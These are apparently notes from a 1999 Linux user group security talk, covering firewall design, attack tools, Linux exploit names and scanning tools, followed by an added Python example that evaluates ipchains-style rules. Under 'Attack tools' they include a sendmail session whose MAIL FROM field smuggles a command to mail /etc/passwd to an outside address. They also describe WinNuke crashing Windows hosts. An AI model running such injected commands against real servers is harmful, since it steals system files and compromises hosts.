Taken by David Kramer
q+a
ns threads
Sun has kernel threads, fully multiprocessing
very little difference between kernel threads and processes under Sun, but they all have the same PID, so they'll all be on one line in ps.
George Peron(?sp) has small luggable pentiums
How can other companies offer DSL to you over your existing lines where the phone company can't?
Often they lie, and they can't.
They offer slower speeds for poorer cables.
Announcements
next meet in 4-370 joint with AIP
Meeting-
Michael Hayes and Eric Cole of Vista Info Securities
eric.cole@vistait.com or eric7095@aol.com
slides will be at
http://www.blu.org/meetings/1999/dec/presentation.htm
Lots of F100 companies
pay less for networks and security than for coffee and soft drinks.
hire unknown Y2K experts who may be putting in back doors, and know all the passwords (which the companies typically won't change).
Lots of F100 companies have no security policies, or allow everything outbound.
"Depth of security"- like castles- Always rely on multiple levels of security, some of which are designed merely for detection, some are merely for slowing down attackers.
70% of attacks involve insiders.
AAA
Admin- passwords.
Authorizing- Control who can get to what.
Accounting- Recording who has done what.
Insurance companies may not pay for Y2K or security losses if they can prove you were negligent.
Honeypot- Set up a system that looks like the real system to attract hackers and log heavily.
He says this is a bad idea. Don't attract attention.
NT should never be used as a firewall. The OS itself is not secure enough.
Hardening- removing unwanted services, etc.
(cloud)--[Router]--[Pix fw]--(DMZ/servers)--[Linux fw]-(inside)
Don't put mail server in DMZ. Proxy it to the inside.
There are hacker websites that have the source code for NT, firewall1, Solaris, etc. If the source code could get out, it could be modified and get put back in with back doors.
In Netscape, type link://kramer.ne.mediaone.net to find sites that link to your site.
www.grc.com Gibson Research.
Attack tools
WinNuke- Just type in IP address of Win95/98/NT box and this kills it. Connects to 139 NetBios. It sends out-of-band data that it's not expecting.
l0phtcrack.
sendmail
mail from: "/bin/mail me@host < /etc/passwd"
.. sender ok
rcpt to: mickeymouse
550 unknown user
data
354 enter mail .
Linux exploits
2.2 frag ICMP kernel panic
SDI-pop2 during IMAP anonymous_login() uid is nobody
SDI wu-ftp will let you execute commands as root if you have write access to the server
Sesquipedalian- DoS, Linux 2.1.89-2.2.3: zero-length fragment bug.
procrace- Linux 2.2.1 contains a /proc race condition allowing local users to crash the kernel.
Linux 2.0.36+ automount allows normal users to gain root via kernel overflow
Tools
Runs on host
IPChains/ipfwadm
Specific rules first, more general rules later.
IPChains adds
portfw
chains, intricate rules
quality of service routing
ip/port/interface and not (!)
ipfwadm2ipchains
Mason- figures your rules by watching what you do.
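Added example (not from the talk or these notes): a small first-match chain evaluator, in the style of ipchains, showing why specific rules must come before general ones and a check that flags rules an earlier, broader rule shadows. The addresses, ports and chains are constructed for the firewall layout in the notes (inside hosts, DMZ, a mail proxy in the DMZ).

```python
import ipaddress

# Rule = (protocol, source net, dest net, dest port or None, target).
# As with ipchains, the first rule that matches decides the packet.
def first_match(rules, proto, src, dst, dport, policy="DENY"):
    src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for r_proto, r_src, r_dst, r_port, target in rules:
        if r_proto not in ("all", proto):
            continue
        if src_ip not in ipaddress.ip_network(r_src):
            continue
        if dst_ip not in ipaddress.ip_network(r_dst):
            continue
        if r_port is not None and r_port != dport:
            continue
        return target
    return policy  # chain policy applies when nothing matched

def shadowed(rules):
    """Indices of rules made unreachable by an earlier, broader rule."""
    out = []
    for i, (p, s, d, port, _) in enumerate(rules):
        for q, s2, d2, port2, _ in rules[:i]:
            if (q in ("all", p) and (port2 is None or port2 == port)
                    and ipaddress.ip_network(s).subnet_of(ipaddress.ip_network(s2))
                    and ipaddress.ip_network(d).subnet_of(ipaddress.ip_network(d2))):
                out.append(i)
                break
    return out

# Constructed addresses: inside LAN, DMZ, and the mail proxy host in the DMZ.
INSIDE, DMZ, PROXY = "192.168.1.0/24", "10.0.0.0/24", "10.0.0.25/32"

# Specific rules first: narrow ACCEPTs, then the broad outbound DENY.
GOOD_CHAIN = [
    ("tcp", INSIDE, PROXY, 25, "ACCEPT"),        # inside may speak SMTP to the proxy
    ("udp", INSIDE, DMZ, 53, "ACCEPT"),          # and DNS to the DMZ
    ("all", INSIDE, "0.0.0.0/0", None, "DENY"),  # everything else outbound is dropped
]
# Same three rules with the general DENY first: it shadows the ACCEPTs.
BAD_CHAIN = [GOOD_CHAIN[2], GOOD_CHAIN[0], GOOD_CHAIN[1]]

def smtp_to_proxy(chain):
    return first_match(chain, "tcp", "192.168.1.7", "10.0.0.25", 25)

def telnet_outbound(chain):
    return first_match(chain, "tcp", "192.168.1.7", "203.0.113.9", 23)

if __name__ == "__main__":
    print("good:", smtp_to_proxy(GOOD_CHAIN), telnet_outbound(GOOD_CHAIN), shadowed(GOOD_CHAIN))
    print("bad: ", smtp_to_proxy(BAD_CHAIN), telnet_outbound(BAD_CHAIN), shadowed(BAD_CHAIN))
```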
netfilter
next gen packet firewalling
check.pl checks file/dir permissions/setuids.
cops (old)
tiger (under devel)
Runs outside
strobe- old port scanning tool
nmap
queso- checks for well-known attacks, not really a port scanner
nessus- very good scanning tool
Saint- like Satan
Cheops checks for OS vulnerabilities
ftpcheck/relaycheck checks for servers that relay
SARA Security Auditor's Research Assistant- like Satan.
BASS Bulk Auditing Security Scanner- Scan several servers.
Detection
tripwire